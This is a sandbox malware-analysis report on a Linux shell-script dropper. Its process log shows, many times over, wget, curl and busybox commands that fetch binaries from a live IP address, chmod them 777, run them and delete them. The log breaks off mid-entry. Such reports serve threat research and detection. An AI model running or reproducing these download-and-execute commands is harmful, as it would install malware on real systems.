Analysis Overview
SHA256
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
Threat Level: Shows suspicious behavior
The file 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 07:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 07:02
Reported
2024-11-21 07:04
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
35s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
Processes
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
